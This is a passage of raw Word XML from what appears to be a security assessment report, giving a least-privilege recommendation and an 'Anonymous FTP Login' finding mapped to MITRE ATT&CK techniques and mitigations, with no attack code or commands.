          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C9E1A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reating service accounts with limited access</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="76EA5138">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, following the Principle of Least </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="76EA5138">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="76EA5138">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E00E026" w:rsidP="0D325B6E" w:rsidRDefault="1E00E026" w14:paraId="064A706D" w14:textId="096B7B7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">Regularly audit </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2BDA3684">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">user and system account </w:t>
      </w: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permissions to ensur</w:t>
      </w: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e n</w:t>
      </w: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 xml:space="preserve">o </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_arULHQZ5" w:id="1276951835"/>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priv</w:t>
      </w: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ile</w:t>
      </w:r>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ge</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1276951835"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1E00E026">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> creep occurs over time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2DAF1FCD" w14:textId="47D6D8FA">
      <w:pPr>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AAB7E19" w:rsidP="0D325B6E" w:rsidRDefault="2AAB7E19" w14:paraId="59F71765" w14:textId="09E1215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AAB7E19">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1248349" w:rsidP="0D325B6E" w:rsidRDefault="61248349" w14:paraId="5F59A253" w14:textId="7544FC5C">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R0fc2676cce524f16">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="61248349">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>CrowdStrike - Principle of Least Privilege</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0D68DD50" w14:textId="1EA658D0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2B660A2D" w14:textId="23523FB6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="247D23A5" w14:textId="15B663E1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="31A1CA18" w14:textId="68E798F2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B39266A" w:rsidP="0D325B6E" w:rsidRDefault="1B39266A" w14:paraId="276D15BA" w14:textId="07D218A1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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640735673" w:id="1399179188"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B39266A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B39266A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc876899508" w:id="1676916020"/>
      <w:bookmarkStart w:name="_Toc879410745" w:id="307748826"/>
      <w:bookmarkStart w:name="_Toc1711305947" w:id="14122718"/>
      <w:bookmarkStart w:name="_Toc1520743275" w:id="1306281599"/>
      <w:bookmarkStart w:name="_Toc1964566525" w:id="262798343"/>
      <w:bookmarkStart w:name="_Toc500805274" w:id="1579446122"/>
      <w:bookmarkStart w:name="_Toc26700572" w:id="627419700"/>
      <w:bookmarkStart w:name="_Toc2003259184" w:id="1527297974"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C219125">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01AB5629">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anonymous FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="392A516E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01AB5629">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ogin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1676916020"/>
      <w:bookmarkEnd w:id="307748826"/>
      <w:bookmarkEnd w:id="14122718"/>
      <w:bookmarkEnd w:id="1306281599"/>
      <w:bookmarkEnd w:id="262798343"/>
      <w:bookmarkEnd w:id="1579446122"/>
      <w:bookmarkEnd w:id="627419700"/>
      <w:bookmarkEnd w:id="1527297974"/>
      <w:bookmarkEnd w:id="139917918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33C60D6B">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090EB76" w14:textId="516072A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4A4611F" w14:textId="1EE14A4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5F002DE" w14:textId="7009F95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095DAA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16FF5E" w14:textId="22770AF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3B2680E3" w14:textId="0A31B94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26C54D7A" w14:textId="20895FB9">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C3567DD" w14:textId="3DB5A25F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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0065C86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D0A5FA" w14:textId="4BFCE60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1BCE58B8" w:rsidP="0D325B6E" w:rsidRDefault="1BCE58B8" w14:paraId="5E468D05" w14:textId="68B8182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1BCE58B8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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7CC060C8"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77633AEC"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="20872BF7">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DA2017" w14:textId="7DDDE3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483D1A1" w14:textId="5D8FA487">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63042375">
        <w:trPr>
          <w:trHeight w:val="825"/>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77C7493" w14:textId="636EF14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6479F230" w:rsidP="0D325B6E" w:rsidRDefault="6479F230" w14:paraId="3E0169E9" w14:textId="42508FF4">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6479F230">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00F4833" w14:textId="73D2BE64">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R93d4363fbd6c4832">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>T1</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="601494C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>105</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2F4F9FE8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="601494C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="09E8DAF2" w:rsidP="0D325B6E" w:rsidRDefault="09E8DAF2" w14:paraId="24972880" w14:textId="19B537FA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R95ca3ddc3a8841cd">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="09E8DAF2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>T1048</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0655A541">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve">: </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="09E8DAF2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>Exfiltration Over Alternative Protocol</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="540E4913">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7B7BD637"/>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1C56BC43" w:rsidP="0D325B6E" w:rsidRDefault="1C56BC43" w14:paraId="7F1D7426" w14:textId="17DB94B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1C56BC43">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1DB21B0D" w:rsidP="0D325B6E" w:rsidRDefault="1DB21B0D" w14:paraId="6FB3E07D" w14:textId="2B79902A">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R49278790b83e4695">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1DB21B0D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M1022</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7D9A1330">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1DB21B0D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Restrict File and Directory Permissions</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="1DB21B0D" w:rsidP="0D325B6E" w:rsidRDefault="1DB21B0D" w14:paraId="4E7451D8" w14:textId="315F3AB1">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R166dd4e4c70b4091">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1DB21B0D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M1035</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4F34EE95">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1DB21B0D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Limit Access to Resource Over Network</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6514BBB4">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5A03FC8" w14:textId="0088E28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4457D45" w14:textId="283F5719">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="20675CD9" w14:textId="74CC4DAD">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C219125" w:rsidP="0D325B6E" w:rsidRDefault="3C219125" w14:paraId="543E1CBF" w14:textId="7794E9B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21912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24165D9A" w:rsidP="0D325B6E" w:rsidRDefault="24165D9A" w14:paraId="49245C9E" w14:textId="376F513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 xml:space="preserve">Anonymous FTP login is </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permitted</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 xml:space="preserve"> on the internal FTP server. </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This allows a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1DE7378F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ny unauthenticated user</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to view any internal files that are not restricted to specific users on the FTP server.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="24165D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A1E85B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attackers can also bring exploit tools into the network by uploading them to the FTP share, allowing for privilege escalation and pivoting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="53EDBBD3" w14:textId="09198D3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219125" w:rsidP="0D325B6E" w:rsidRDefault="3C219125" w14:paraId="609A016D" w14:textId="08153DF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21912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AF48208" w:rsidP="0D325B6E" w:rsidRDefault="0AF48208" w14:paraId="48F51C03" w14:textId="351865F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AF48208">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If the FTP server is </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0AF48208">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>utilized</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0AF48208">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24005020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>serve</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0AF48208">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sensitive files and data, attackers are easily able to anonymously log in and view the data on the FTP server. Attackers can also abuse the FTP server to get exploitation tools </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1191412D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">into the internal network and </w:t>
      </w:r>
